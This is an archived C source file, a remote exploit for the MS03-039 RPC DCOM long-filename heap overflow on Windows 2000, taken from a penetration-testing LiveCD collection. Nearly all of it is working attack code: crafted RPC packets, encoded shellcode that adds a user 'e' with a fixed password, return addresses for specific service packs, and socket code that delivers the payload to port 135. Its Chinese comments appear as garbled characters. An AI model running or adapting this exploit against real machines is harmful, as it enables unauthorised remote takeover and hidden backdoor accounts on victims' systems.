home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / MS03-039-exp.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  13KB  |  299 lines
  1. /*
  2. ▓╔╙├╡─╩╟╕▓╕╟TopLevelExceptionFilterú¼╚╗║≤╙├call [ebp+74]íú╧Ω╧╕╡─╝╝╩⌡├Φ╩÷╟δ▓╬╝√
  3. http://www.immunitysec.com/papers/msrpcheap.pdf
  4. http://www.immunitysec.com/papers/msrpcheap2.pdf
  5.  
  6.  ╕╨╨╗falshsky & benjurry & Dave Aitel(┼┼├√▓╗╖╓╧╚║≤^_^)
  7.  
  8. ╒Γ╕÷exp╖╟│ú▓╗═¿╙├íú╥╗░π╧╚pskill rpcssú¼╚╗║≤╘┘╘╦╨╨╒Γ╕÷expú¼╚τ╣√░µ▒╛▓╬╩²├╗┤φ╡─╗░ú¼
  9. ╗∙▒╛╔╧┐╔╥╘│╔╣ªíú│╔╣ª╡─╗░ú¼╗ß╠φ╝╙╥╗╕÷╒╦║┼íú
  10.  
  11. */
  12. #include <stdio.h>
  13. #include <winsock2.h>
  14. #include <windows.h>
  15. #include <process.h>
  16. #include <string.h>
  17. #include <winbase.h>
  18.  
  19. #pragma comment(lib,"ws2_32")
  20.  
  21. unsigned char bindstr[]={
  22. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  23. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  24. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  25. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  26. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  27.  
  28. unsigned char request1[]={
  29. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  30. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  31. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  32. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  33. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  34. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  35. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  36. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  37. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  38. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  39. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  40. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  41. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  42. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  43. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  44. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  45. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  46. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  47. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  48. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  49. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  50. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  51. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  52. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  53. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  54. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  55. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  56. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  57. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  58. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  59. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  60. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  61. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  62. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  63. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  65. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  66. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  67. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  69. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  70. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  71. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  72. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  73. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  75. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  76. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  77. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  78. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  79. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  80. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  82. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  83. ,0x00,0x00,0x00,0x00,0x00,0x00};
  84.  
  85. unsigned char request2[]={
  86. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  87. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  88.  
  89. unsigned char request3[]={
  90. 0x5C,0x00
  91. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  92. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  93. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  94. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  95.  
  96. //user="e" pass="asd#321"
  97. unsigned char sc_add_user[]=
  98. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
  99. "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
  100. "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
  101. "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
  102. "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
  103. "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
  104. "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
  105. "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
  106. "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
  107. "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
  108. "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
  109. "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
  110. "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
  111. "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
  112. "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
  113. "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
  114. "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
  115. "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
  116. "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
  117. "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
  118. #define    sc_offset        0x24
  119. #define    sc_max            0x208
  120. #define    jmp_addr_offset    sc_max+sc_offset+0x8
  121. #define    top_seh_offset    jmp_addr_offset+0x4
  122.  
  123. unsigned char sc[]=
  124. "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
  125. "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
  126. "\x43\x00\x24\x00\x5c\x00"
  127. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  128. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  129. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  130. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  131. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  132. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  133. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  134. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  135. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  136. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  137. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  138. "\xe9\xf3\xfd\xff\xff"
  139. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
  140.  
  141. unsigned char request4[]={
  142. 0x01,0x10
  143. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  144. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  145. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  146. };
  147.  
  148. struct
  149. {
  150.     char    *os;
  151.     DWORD    dwTopSeh;
  152.     char    *seh;
  153.     DWORD    dwJmpAddr;
  154.     char    *jmp;
  155. }
  156. targets[] =
  157. {
  158.     { "2kEnSp4+MS03-026", 
  159.         0x7c54144c,
  160.         "kernel32.dll v5.0.2195.6688",
  161.         0x77a1b496,
  162.         "OLEAUT32.dll v2.40.4522.0"},
  163.     { "2kEnSp3+SomeHotFixs+MS03-026", 
  164.         0x77eda1f0,
  165.         "kernel32.dll v5.0.2195.6079",
  166.         0x77a1afa9,
  167.         "OLEAUT32.dll v2.40.4518.0"}
  168. }, v;
  169. void main(int argc,char ** argv)
  170. {
  171.     WSADATA WSAData;
  172.     SOCKET sock;
  173.     int len,len1;
  174.     SOCKADDR_IN addr_in;
  175.     short port=135;
  176.     unsigned char buf1[0x1000];
  177.     unsigned char buf2[0x1000];
  178.     int    i, iType;
  179.  
  180.     printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
  181.             "Base on flashsky's MS03-026 exp\n"
  182.             "Code by ey4s<eyas#xfocus.org>\n"
  183.             "2003-09-16\n"
  184.             "Welcome to http://www.xfocus.net\n"
  185.             "Thanks to flashsky & benjurry & Dave Aitel\n"
  186.             "If success, target will add a user \"e\" and password is \"asd#321\"\n\n");
  187.  
  188.     if(argc!=3)
  189.     {
  190.         printf("Usage: %s <target> <type>\n", argv[0]);
  191.         for(i = 0; i < sizeof(targets)/sizeof(v); i++)
  192.             printf( "<%d>   %s\n"
  193.                     "      TopSeh=0x%.8x in %s\n"
  194.                     "      JmpAddr=0x%.8x in %s\n",
  195.                     i, targets[i].os,
  196.                     targets[i].dwTopSeh, targets[i].seh,
  197.                     targets[i].dwJmpAddr, targets[i].jmp);
  198.         return;
  199.     }
  200.  
  201.     iType = atoi(argv[2]);
  202.     if((iType<0) || iType > sizeof(targets)/sizeof(v))
  203.     {
  204.         printf("[-] Wrong type.\n");
  205.         return;
  206.     }
  207.  
  208.     memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
  209.     memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
  210.     memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
  211.     printf("[+] Prepare shellcode completed.\n");
  212.  
  213.     if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  214.     {
  215.         printf("WSAStartup error.Error:%d\n",WSAGetLastError());
  216.         return;
  217.     }
  218.  
  219.     addr_in.sin_family=AF_INET;
  220.     addr_in.sin_port=htons(port);
  221.     addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
  222.     
  223.     if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  224.     {
  225.         printf("Socket failed.Error:%d\n",WSAGetLastError());
  226.         return;
  227.     }
  228.     if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
  229.     {
  230.         printf("Connect failed.Error:%d",WSAGetLastError());
  231.         return;
  232.     }
  233.     printf("[+] Connect to %s:135 success.\n", argv[1]);
  234.  
  235.     if(sizeof(sc_add_user) > sc_max)
  236.     {
  237.         printf("[-] shellcode too long, exit.\n");
  238.         return;
  239.     }
  240.  
  241.  
  242.     len=sizeof(sc);
  243.     memcpy(buf2,request1,sizeof(request1));
  244.     len1=sizeof(request1);
  245.     *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //╝╞╦π╬─╝■├√╦½╫╓╜┌│ñ╢╚
  246.     *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//╝╞╦π╬─╝■├√╦½╫╓╜┌│ñ╢╚
  247.     memcpy(buf2+len1,request2,sizeof(request2));
  248.     len1=len1+sizeof(request2);
  249.     memcpy(buf2+len1,sc,sizeof(sc));
  250.     len1=len1+sizeof(sc);
  251.     memcpy(buf2+len1,request3,sizeof(request3));
  252.     len1=len1+sizeof(request3);
  253.     memcpy(buf2+len1,request4,sizeof(request4));
  254.     len1=len1+sizeof(request4);
  255.     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
  256.     //╝╞╦π╕≈╓╓╜ß╣╣╡─│ñ╢╚
  257.     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
  258.     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
  259.     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
  260.     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
  261.     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
  262.     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
  263.     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
  264.  
  265.     len = send(sock,bindstr,sizeof(bindstr),0);
  266.     if(len<=0)
  267.     {
  268.             printf("[-] Send failed.Error:%d\n",WSAGetLastError());
  269.             return;
  270.     }
  271.      else
  272.         printf("[+] send %d bytes.\n", len);
  273.     
  274.     len=recv(sock,buf1,1000,0);
  275.     if(len<=0)
  276.     {
  277.         printf("[-] recv error:%d\n", GetLastError());
  278.         return;
  279.     }
  280.     else
  281.         printf("[+] recv %d bytes.\n", len);
  282.  
  283.     len = send(sock,buf2,len1,0);
  284.     if(len<=0)
  285.     {
  286.             printf("[-] Send failed.Error:%d\n",WSAGetLastError());
  287.             return;
  288.     }
  289.     else
  290.         printf("[+] send %d bytes.\n", len);
  291.     len=recv(sock,buf1,1024,0);
  292.     if(len<=0)
  293.     {
  294.         printf("[+] Target crash or exploit success? :)\n");
  295.     }
  296.     else
  297.         printf("[-] recv %d bytes. Bad luck!\n", len);
  298. }
  299.